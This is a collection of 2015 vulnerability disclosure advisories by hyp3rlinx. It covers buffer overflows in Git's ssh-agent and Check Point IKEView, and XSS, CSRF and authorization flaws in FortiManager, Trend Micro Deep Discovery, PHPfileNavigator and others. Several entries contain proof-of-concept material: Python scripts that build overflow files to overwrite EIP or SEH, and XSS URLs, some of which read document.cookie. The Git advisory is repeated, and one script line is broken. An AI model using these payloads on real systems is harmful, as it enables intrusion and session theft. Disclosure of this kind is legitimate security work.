[+] Credits: hyp3rlinx [+] Website: hyp3rlinx.altervista.org [+] Source: http://hyp3rlinx.altervista.org/advisories/AS-GIT-SSH-AGENT-BUFF-OVERFLOW.txt Vendor: git-scm.com Product: Git-1.9.5-preview20150319.exe github.com/msysgit/msysgit/releases/tag/Git-1.9.5-preview20150319 Vulnerability Type: === Buffer Overflow CVE Reference: == N/A Vulnerability Details: = Git Windows SVN ssh-agent.exe is vulnerable to buffer overflow. Under cmd dir in Git there is start-ssh-agent.cmd file used to invoke ssh-agent.exe. This is local attack vector in which if the "start-ssh-agent.cmd" file is replaced with specially crafted malicious '.cmd' file we cause buffer overflow, code execution may become possible. Fault module seems to be msys-1.0.dll File Name: msys-1.0.dll MD5: 39E779952FF35D1EB3F74B9C36739092 APIVersion: 0.46 Stack trace: - MSYS-1.0.12 Build:2012-07-05 14:56 Exception: STATUS_ACCESS_VIOLATION at eip=41414141 eax= ebx=0028FA3C ecx=680A4C3A edx=680A4C3A esi=0028FA2C edi=1DAC ebp=42424242 esp=0028F9B4 program=C:\Program Files (x86)\Git\bin\ssh-agent.exe cs=0023 ds=002B es=002B fs=0053 gs=002B ss=002B Payload of 944 bytes to cause seg fault: @ 948 bytes we completely overwrite EBP register. @ 972 bytes KABOOM! we control EIP. Quick GDB dump... Program received signal SIGSEGV, Segmentation fault. 0x41414141 in ?? () (gdb) info r eax0x -1 ecx0x680a4c3a 1745505338 edx0x680a4c3a 1745505338 ebx0x28f90c 2685196 esp0x28f884 0x28f884 ebp0x41414141 0x41414141 esi0x28f8fc 2685180 edi0x2660 9824 eip0x41414141 0x41414141 eflags 0x10246 [ PF ZF IF RF ] cs 0x23 35 ss 0x2b 43 ds 0x2b 43 es 0x2b 43 fs 0x53 83 gs 0x2b 43 POC code(s): === Python script below to create a malicious 'start-ssh-agent.cmd' file that will be renamed to 'ssh_agent_hell.cmd' and moved to the Git/bin directory, once run will cause buffer overflow and overwrite EIP. Save following as ssh-agent-eip.py or whatever, run the script to generate a new malicious '.cmd' file and run it! import struct,os,shutil #Git ssh-agent.exe #EIP overwrite at 972 bytes #By hyp3rlinx #== file="C:\\Program Files (x86)\\Git\\bin\\ssh_agent_hell" payload="CALL ssh-agent.exe " x=open(file,"w") eip="A"*4 payload+="B"*968+eip x.write(payload) x.close() src="C:\\Program Files (x86)\\Git\\bin\\" shutil.move(file,file+".cmd") print "Git ssh-agent.exe buffer overflow POC\n" print "ssh_agent_hell.cmd file created!...\n" print "by hyp3rlinx" print "\n" Disclosure Timeline: = Vendor Notification: August 10, 2015 Sept 26, 2015 : Public Disclosure Exploitation Technique: === Local Description: == Vulnerable Product: [+] Git-1.9.5-preview20150319.exe === [+] Disclaimer Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and prohibits any malicious use of all security related information or exploits by the author or elsewhere. by hyp3rlinx
Git-1.9.5 ssh-agent.exe Buffer Overflow
[+] Credits: hyp3rlinx [+] Website: hyp3rlinx.altervista.org [+] Source: http://hyp3rlinx.altervista.org/advisories/AS-GIT-SSH-AGENT-BUFF-OVERFLOW.txt Vendor: git-scm.com Product: Git-1.9.5-preview20150319.exe github.com/msysgit/msysgit/releases/tag/Git-1.9.5-preview20150319 Vulnerability Type: === Buffer Overflow CVE Reference: == N/A Vulnerability Details: = Git Windows SVN ssh-agent.exe is vulnerable to buffer overflow. Under cmd dir in Git there is start-ssh-agent.cmd file used to invoke ssh-agent.exe. This is local attack vector in which if the "start-ssh-agent.cmd" file is replaced with specially crafted malicious '.cmd' file we cause buffer overflow, code execution may become possible. Fault module seems to be msys-1.0.dll File Name: msys-1.0.dll MD5: 39E779952FF35D1EB3F74B9C36739092 APIVersion: 0.46 Stack trace: - MSYS-1.0.12 Build:2012-07-05 14:56 Exception: STATUS_ACCESS_VIOLATION at eip=41414141 eax= ebx=0028FA3C ecx=680A4C3A edx=680A4C3A esi=0028FA2C edi=1DAC ebp=42424242 esp=0028F9B4 program=C:\Program Files (x86)\Git\bin\ssh-agent.exe cs=0023 ds=002B es=002B fs=0053 gs=002B ss=002B Payload of 944 bytes to cause seg fault: @ 948 bytes we completely overwrite EBP register. @ 972 bytes KABOOM! we control EIP. Quick GDB dump... Program received signal SIGSEGV, Segmentation fault. 0x41414141 in ?? () (gdb) info r eax0x -1 ecx0x680a4c3a 1745505338 edx0x680a4c3a 1745505338 ebx0x28f90c 2685196 esp0x28f884 0x28f884 ebp0x41414141 0x41414141 esi0x28f8fc 2685180 edi0x2660 9824 eip0x41414141 0x41414141 eflags 0x10246 [ PF ZF IF RF ] cs 0x23 35 ss 0x2b 43 ds 0x2b 43 es 0x2b 43 fs 0x53 83 gs 0x2b 43 POC code(s): === Python script below to create a malicious 'start-ssh-agent.cmd' file that will be renamed to 'ssh_agent_hell.cmd' and moved to the Git/bin directory, once run will cause buffer overflow and overwrite EIP. Save following as ssh-agent-eip.py or whatever, run the script to generate a new malicious '.cmd' file and run it! import struct,os,shutil #Git ssh-agent.exe #EIP overwrite at 972 bytes #By hyp3rlinx #== file="C:\\Program Files (x86)\\Git\\bin\\ssh_agent_hell" payload="CALL ssh-agent.exe " x=open(file,"w") eip="A"*4 payload+="B"*968+eip x.write(payload) x.close() src="C:\\Program Files (x86)\\Git\\bin\\" shutil.move(file,file+".cmd") print "Git ssh-agent.exe buffer overflow POC\n" print "ssh_agent_hell.cmd file created!...\n" print "by hyp3rlinx" print "\n" Disclosure Timeline: = Vendor Notification: August 10, 2015 Sept 26, 2015 : Public Disclosure Exploitation Technique: === Local Description: == Vulnerable Product: [+] Git-1.9.5-preview20150319.exe === [+] Disclaimer Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and prohibits any malicious use of all security related information or exploits by the author or elsewhere. by hyp3rlinx
FortiManager v5.2.2 Multiple XSS Vulnerabilities
[+] Credits: hyp3rlinx [+] Website: hyp3rlinx.altervista.org [+] Source: http://hyp3rlinx.altervista.org/advisories/AS-FORTIMANAGER-XSS-0924.txt Vendor: www.fortinet.com Product: FortiManager v5.2.2 FortiManager is a centralized security management appliance that allows you to centrally manage any number of Fortinet Network Security devices. Vulnerability Type: === Multiple Cross Site Scripting ( XSS ) in FortiManager GUI http://www.fortiguard.com/advisory/multiple-xss-vulnerabilities-in-fortimanager-gui CVE Reference: == Pending Vulnerability Details: = The Graphical User Interface (GUI) of FortiManager v5.2.2 is vulnerable to two reflected Cross-Site Scripting (XSS) vulnerabilities. 2 potential XSS vectors were identified: * XSS vulnerability in SOMVpnSSLPortalDialog. * XSS vulnerability in FGDMngUpdHistory. The Graphical User Interface (GUI) of FortiManager v5.2.3 is vulnerable to one reflected XSS vulnerability and one stored XSS vulnerability. 2 potential XSS vectors were identified: * XSS vulnerability in sharedjobmanager. * XSS vulnerability in SOMServiceObjDialog. Affected Products XSS items 1-2: FortiManager v5.2.2 or earlier. XSS items 3-4: FortiManager v5.2.3 or earlier. Solutions: === No workarounds are currently available. Update to FortiManager v5.2.4. Exploit code(s): === 1- Persistent: https://localhost/cgi-bin/module/sharedobjmanager/firewall/SOMServiceObjDialog?devGrpId=18446744073709551615=18446744073709551615==3=0=ems=167=0=ALL=167=167_w=1=189=0=50 alert(666) 2- Reflected https://localhost/cgi-bin/module/sharedobjmanager/policy_new/874/PolicyTable?vdom=%22%27/%3E%3C/script%3E%3Cscript%3Ealert%28%27[XSS%20FortiManager%20POC%20VM64%20v5.2.2%2008042015%20]\n\n%27%2bdocument.cookie%29%3C/script%3E Disclosure Timeline: = Vendor Notification: August 4, 2015 September 24, 2015 : Public Disclosure Exploitation Technique: === Remote & Local Severity Level: = Medium (3) Description: == Request Method(s): [+] GET Vulnerable Product: [+] FortiManager v5.2.2 & v5.2.3 or earlier Vulnerable Parameter(s):[+] vdom, textarea field Affected Area(s): [+] sharedobjmanager, SOMServiceObjDialog === [+] Disclaimer Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and prohibits any malicious use of all security related information or exploits by the author or elsewhere. by hyp3rlinx
Microsoft Exchange Information Disclosure
[+] Credits: hyp3rlinx [+] Website: hyp3rlinx.altervista.org [+] Source: http://hyp3rlinx.altervista.org/advisories/AS-MS-EXCHANGE-INFO-DISCLOSURE.txt Vendor: www.microsoft.com Product: Microsoft Exchange Outlook Web Vulnerability Type: === Information Disclosure CVE Reference: == CVE-2015-2505 http://www.securitytracker.com/id/1033495 Vulnerability Details: = Microsoft Exchange Outlook Web Access Lets Remote Users Obtain Potentially Sensitive Information Fix Available: Yes Vendor Confirmed: Yes Version(s): 2013 SP1, 2013 Cumulative Update 8, 2013 Cumulative Update 9 A remote user can obtain potentially sensitive information on the target system. Outlook Web Access (OWA) does not properly handle web requests. A remote user can send a specially crafted request to the target web application to view potentially sensitive stack trace information on the target system [CVE-2015-2505]. Exploit code(s): === N/A Disclosure Timeline: = Vendor Notification: April 10, 2015 Sept 8, 2015 : Public Disclosure [+] Disclaimer Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and prohibits any malicious use of all security related information or exploits by the author or elsewhere. by hyp3rlinx
IKEView.exe R60 Stack Buffer Overflow
[+] Credits: hyp3rlinx [+] Website: hyp3rlinx.altervista.org [+] Source: http://hyp3rlinx.altervista.org/advisories/AS-IKEVIEWR60-0914.txt Vendor: www.checkpoint.com http://pingtool.org/downloads/IKEView.exe Product: == IKEView.exe Feature Pack NGX R60 - Build 59104 IKEVIew.EXE is used to inspect - internet private key exchanges on the Firewall phase(1 & 2) packets being exchanged with switches and gateways. IKEVIEW is a Checkpoint Partner tool available for VPN troubleshooting purposes. It is a Windows executable that can be downloaded from Checkpoint.com. This file parses the IKE.elg file located on the firewall. To use IKEVIEW for VPN troubleshooting do the following: 1. From the checkpoint firewall type the following: vpn debug ikeon This will create the IKE.elg file located in $FWDIR/log 2. Attempt to establish the VPN tunnel. All phases of the connection will be logged to the IKE.elg file. 3. SCP the file to your local desktop. WINSCP works great 4. Launch IKEVIEW and select File>Open. Browse to the IKE.elg file. Vulnerability Type: == Stack Buffer Overflow CVE Reference: == N/A Vulnerability Details: = IKEView.exe is vulnerable to local stack based buffer overflow when parsing an malicious (internet key exchange) ".elg" file. Vulnerability causes nSEH & SEH pointer overwrites at 4432 bytes after IKEView parses our malicious file, which may result then result in arbitrary attacker supplied code execution. 0018F868 |41414141 0018F86C |01FC56D0 ÐVü ASCII "File loaded in 47 minutes, 00 seconds." 0018F870 |41414141 0018F874 |41414141 Pointer to next SEH record 0018F878 |42424242 SE handler 0018F87C |0002 ... Quick Buffer Overflow POC : === 1) Below python file to create POC save as .py it will generate POC file, open in IKEView.exe and KABM! seh="B"*4 #<--will overwrite SEH with bunch of 42's HEX for 'B' ASCII char. file="C:\\IKEView-buffer-overflow.elg" x=open(file,"w") payload="A"*4428+seh x.write(payload) x.close() print "\n===\n" print " IKEView-buffer-overflow.elg file created\n" print " hyp3rlinx ..." print "=\n" Exploitation Technique: === Local Severity Level: = High Description: == Vulnerable Product: [+] IKEView.exe Feature Pack NGX R60 - Build 59104 Vulnerable File Type: [+] .elg Affected Area(s): [+] Local OS === [+] Disclaimer Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and prohibits any malicious use of all security related information or exploits by the author or elsewhere. by hyp3rlinx
IKEView.exe Fox beta 1 Stack Buffer Overflow
[+] Credits: hyp3rlinx [+] Website: hyp3rlinx.altervista.org [+] Source: http://hyp3rlinx.altervista.org/advisories/AS-CP_IKEVIEW-0911.txt Vendor: www.checkpoint.com Product: IKEView.exe Fox beta 1 IKEVIew.EXE is used to inspect - internet private key exchanges on the Firewall phase(1 & 2) packets being exchanged with switches and gateways. Vulnerability Type: == Stack Buffer Overflow CVE Reference: == N/A Vulnerability Details: = IKEView.exe is vulnerable to local stack based buffer overflow when parsing an malicious (internet key exchange) ".elg" file. Vulnerability causes nSEH & SEH pointer overwrites at 4448 bytes after IKEView parses our malicious file, which may result then result in arbitrary attacker supplied code execution. quick GDB register dump: EAX ECX 41414141 EDX 7774B4AD ntdll.7774B4AD EBX ESP 0018E0E0 EBP 0018E100 ESI EDI EIP 41414141 C 0 ES 002B 32bit 0() P 1 CS 0023 32bit 0() A 0 SS 002B 32bit 0() Z 1 DS 002B 32bit 0() S 0 FS 0053 32bit 7EFDD000(FFF) T 0 GS 002B 32bit 0() D 0 O 0 LastErr ERROR_SUCCESS () ---SEH Chain- 0:000> !exchain 0018f870: 42424242 Invalid exception stack at 41414141 0:000> 0018f870: 42424242 Invalid exception stack at 41414141 0:000> 0018F868 |02004AE0 àJ. ASCII "File loaded in 08 minutes, 01 seconds." 0018F86C |41414141 0018F870 |41414141 Pointer to next SEH record 0018F874 |42424242 SE handler Quick Buffer Overflow POC : === 1) Below python file to create POC save as .py it will generate POC file, open in IKEView.exe and KABM! seh="B"*4 #<--will overwrite SEH with bunch of 42's HEX for 'B' ASCII char. file="C:\\IKEView-buffer-overflow.elg" x=open(file,"w") payload="A"*+seh x.write(payload) x.close() print "\n===\n" print " IKEView-buffer-overflow.elg file created\n" print " hyp3rlinx ..." print "=\n" Exploitation Technique: === Local Severity Level: = High Description: == Vulnerable Product: [+] IKEView.exe Fox beta 1 Vulnerable File Type: [+] .elg Affected Area(s): [+] Local OS === [+] Disclaimer Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and prohibits any malicious use of all security related information or exploits by the author or elsewhere. by hyp3rlinx
JSPMySQL Administrador CSRF & XSS Vulnerabilities
[+] Credits: hyp3rlinx [+] Website: hyp3rlinx.altervista.org [+] Source: http://hyp3rlinx.altervista.org/advisories/AS-JSPMYSQLADMINISTRADOR-0904.txt Vendor: JSPMySQL Administrador https://sites.google.com/site/mfpledon/producao-de-software Product: JSPMySQL Administrador v.1 is a remote administration of MySQL databases that are on a Web server using JSP technology Vulnerability Type: === CSRF & XSS CVE Reference: == N/A Vulnerability Details: = 1) No CSRF token exists allowing remote attackers to run arbitrary SQL commands on the MySQL database. 2) XSS entry point exists on the listaBD2.jsp web page opening up the application for client side browser code execution. In either case get victim to visit our malicious webpage or click on our malicious linx then KABOOM!!! Exploit code(s): === 1- CSRF to drop the default MySQL database on the remote server: JSP-MYSQL-ADMIN-CSRF
Trend Micro Deep Discovery Authentication Bypass
[+] Credits: John Page aka hyp3rlinx [+] Website: hyp3rlinx.altervista.org [+] Source: http://hyp3rlinx.altervista.org/advisories/TREND-MICRO-DDI-0818.txt Vendor: www.trendmicro.com Product: === Trend Micro Deep Discovery 3.7.1096 Vulnerability Type: === Authentication Bypass CVE Reference: == CVE-2015-2873 Vulnerability Details: === http://esupport.trendmicro.com/solution/en-US/1112206.aspx http://www.kb.cert.org/vuls/id/248692 Trend Micro Deep Discovery Threat Appliance version 3.7.1096 Certain Deep Discovery Inspector URLs including the system log and whitelist/blacklist are accessible to a non-administrator user because the pages do not properly check for authorization. An unauthenticated user without administrator privileges may thus gain access to and modify certain system configuration settings. Several URLs, including the system log, whitelist, and blacklist, are accessible to a non-administrator user by direct request. The pages do not properly check for authorization. Impact: === An authenticated user without administrator privileges may access and modify certain system configuration settings. Exploit code(s): === N/A Disclosure Timeline: = Vendor Notification: March 26, 2015 August 18, 2015 : Public Disclosure Severity Level: = High Description: == Request Method(s): [+] GET Vulnerable Product: [+] Trend Micro Deep Discovery 3.7.1096 Vulnerable Parameter(s):[+] syslog, whitelist, blacklist Affected Area(s): [+] Trend Micro Deep Discovery === [+] Disclaimer Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and prohibits any malicious use of all security related information or exploits by the author or elsewhere. by hyp3rlinx
Trend Micro Deep Discovery XSS
[+] Credits: John Page aka hyp3rlinx [+] Website: hyp3rlinx.altervista.org [+] Source: http://hyp3rlinx.altervista.org/advisories/TREND-MICRO-DDI-081815b.txt Vendor: www.trendmicro.com Product: == Trend Micro Deep Discovery 3.7.1096 The Trend Micro Deep Discovery platform enables you to detect, analyze, and respond to todays stealthy, targeted attacks in real time. It may be deployed on a network as an appliance. Vulnerability Type: == Cross Site Scripting (XSS) CVE Reference: == CVE-2015-2872 Vulnerability Details: == http://esupport.trendmicro.com/solution/en-US/1112206.aspx http://www.kb.cert.org/vuls/id/248692 Deep Discovery Inspector is vulnerable to XSS attacks that could allow an unauthenticated user to execute malicious content. On some legacy browsers like IE 7 with a low Security Level, Deep Discovery Inspector is vulnerable to XSS that allows an unauthenticated user to execute malicious content through the index.php The widget implementation is vulnerable to XSS that allows an unauthenticated user to execute malicious content. Exploit code(s): === https://localhost/widget/index.php?menuUrl=1contentUrl='%25;alert('XSS+By+hyp3rlinx+\nMarch+2015')// Disclosure Timeline: = Vendor Notification: March 26, 2015 August 18, 2015 : Public Disclosure Exploitation Technique: === Remote Severity Level: = Medium Description: == Request Method(s): [+] GET Vulnerable Product: [+] Trend Micro Deep Discovery 3.7.1096 Vulnerable Parameter(s):[+] contentURL Affected Area(s): [+] Trend Micro Deep Discovery === [+] Disclaimer Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and prohibits any malicious use of all security related information or exploits by the author or elsewhere. by hyp3rlinx
PHPfileNavigator 2.3.3 Persistent Reflected XSS
[+] Credits: John Page aka hyp3rlinx [+] Website: hyp3rlinx.altervista.org [+] Source: http://hyp3rlinx.altervista.org/advisories/AS-PHPFILENAVIGATOR0812c.txt Vendor: pfn.sourceforge.net Product: === PHPfileNavigator v2.3.3 (pfn) Is state-of-the-art, open source web based application to complete manage your files and folders. Vulnerability Type: = Persistent Reflected XSS CVE Reference: == N/A Vulnerability Details: = Multiple persistent XSS vulnerable fields exist on the 'Modify User' form. nome, usuario, email etc... We can leverage existing CSRF vulnerability to update a victimz profile and store malicious XSS payload or an malicious user can inject there own payloads when updating thier profilez affecting other users and the security of the whole application. Multiple reflected XSS exists as well for following PHP pages all with same vulnerable parameter 'dir' when issuing GET requests. pfn-2.3.3 application seems to filter out script tags etc, but we can bypass this using DIV onMouseMove= JS functions!. navega.php accion.php preferencias.php Tested using xampp-1.7.0 Exploit code(s): === Persistent XSS: --- POST URL: http://localhost/PHPfileNavigator/pfn-2.3.3/xestion/usuarios/index.php?PHPSESSID= e.g. Inject scriptalert(666)/script into the 'Name*', 'User*' or 'Email' field and click Accept button. Injecting XSS into 'name' field will store the XSS payload in the pfn MySQL database in 'pfn_usuarios' table called 'nome' in the 'nome' column. The Same fate will happen for other injected fields 'email 'usuario'. Reflected XSS: -- 1) http://localhost/PHPfileNavigator/pfn-2.3.3/navega.php?PHPSESSID=HELLdir= DIV onMouseMove= alert(document.cookie) /a 2) http://localhost/PHPfileNavigator/pfn-2.3.3/accion.php?accion=buscadorPHPSESSID=HELLdir= DIV onMouseMove= alert(document.cookie) /a 3) http://localhost/PHPfileNavigator/pfn-2.3.3/preferencias.php?PHPSESSID=HELLdir= DIV onMouseMove= alert(document.cookie) /a Disclosure Timeline: = Vendor Notification: August 8, 2015 August 12, 2015 : Public Disclosure Severity Level: = Medium Description: == Request Method(s): [+] POST / GET Vulnerable Product: [+] PHPfileNavigator v2.3.3 (pfn) Vulnerable Parameter(s):[+] nome, usuario, email, dir Affected Area(s): [+] Admin === [+] Disclaimer Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and prohibits any malicious use of all security related information or exploits by the author or elsewhere. by hyp3rlinx